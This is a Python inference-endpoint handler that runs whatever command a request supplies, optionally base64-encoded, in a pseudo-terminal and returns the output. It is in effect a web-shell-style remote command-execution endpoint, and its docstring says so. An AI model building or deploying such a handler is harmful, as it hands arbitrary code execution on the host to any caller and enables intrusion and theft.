"""Inference-endpoint handler that runs a command inside a pseudo-terminal."""

import base64
import os
import pty
import select
import shlex
import subprocess


class EndpointHandler:
    """Run the command supplied in a request and return its terminal output.

    NOTE(security): this handler executes whatever command the request
    carries. The command is tokenized with ``shlex.split`` and started
    without a shell, so shell metacharacters are not interpreted, but the
    caller still chooses the program and its arguments. Access control must
    be enforced outside this class.
    """

    def __init__(self, *args, **kwargs):
        """Accept and ignore any construction arguments."""

    @staticmethod
    def _drain(fd, idle_timeout=0.1, chunk_size=1024):
        """Read from *fd* until it has been idle for *idle_timeout* seconds.

        :param fd: file descriptor to read from
        :param idle_timeout: seconds to wait for more data before giving up
        :param chunk_size: maximum number of bytes requested per read
        :return: everything read, as ``bytes`` (possibly empty)
        """
        chunks = []
        while True:
            ready, _, _ = select.select([fd], [], [], idle_timeout)
            if fd not in ready:
                break
            data = os.read(fd, chunk_size)
            if not data:
                break
            chunks.append(data)
        return b"".join(chunks)

    def run_command(self, command):
        """Run *command* attached to a pseudo-terminal and capture its output.

        stdin, stdout and stderr of the child are all connected to the slave
        side of the pty, so both output streams come back interleaved.

        :param command: command line; split into arguments with ``shlex.split``
        :return: the captured output decoded as UTF-8, with undecodable bytes
            replaced by U+FFFD
        :raises ValueError: if the command is empty or has unbalanced quotes
        :raises OSError: if the pty cannot be opened or the program cannot be
            started
        """
        # Tokenize before allocating the pty so malformed input costs nothing.
        argv = shlex.split(command)
        if not argv:
            raise ValueError("command is empty")

        master_fd, slave_fd = pty.openpty()
        try:
            process = subprocess.Popen(
                argv,
                stdin=slave_fd,
                stdout=slave_fd,
                stderr=slave_fd,
            )
            chunks = []
            while process.poll() is None:
                chunks.append(self._drain(master_fd))
            # Capture any remaining output after the process has finished.
            chunks.append(self._drain(master_fd))
            process.wait()
        finally:
            os.close(master_fd)
            os.close(slave_fd)
        # Commands may emit arbitrary bytes; never fail the request on them.
        return b"".join(chunks).decode(errors="replace")

    def _decode_base64(self, command):
        """Return *command* base64-decoded to text, or unchanged on failure.

        The input is returned as-is when it is not a type ``b64decode``
        accepts, is not valid base64, or does not decode to UTF-8 text.
        NOTE(review): a plain command that happens to be valid base64 of
        UTF-8 text will be decoded as well; the two cases are not
        distinguishable here.

        :param command: candidate base64 payload (any type)
        :return: the decoded string, or the original object
        """
        try:
            return base64.b64decode(command).decode()
        except (TypeError, ValueError):
            # binascii.Error and UnicodeDecodeError are both ValueError.
            return command

    def __call__(self, data):
        """
        Handle one request.

        :param data: input data from the inference endpoint REST API; the
            ``"inputs"`` key is removed from it and used as the command,
            optionally base64-encoded
        :return: ``{"result": output}`` on success, or ``{"error": message}``
            when the input is missing/invalid or the command cannot be run
        """
        command = self._decode_base64(data.pop("inputs", None))
        if not isinstance(command, str):
            return {"error": "inputs attribute is required"}

        try:
            result = self.run_command(command)
        except (OSError, ValueError) as exc:
            return {"error": f"failed to run command: {exc}"}
        return {"result": result}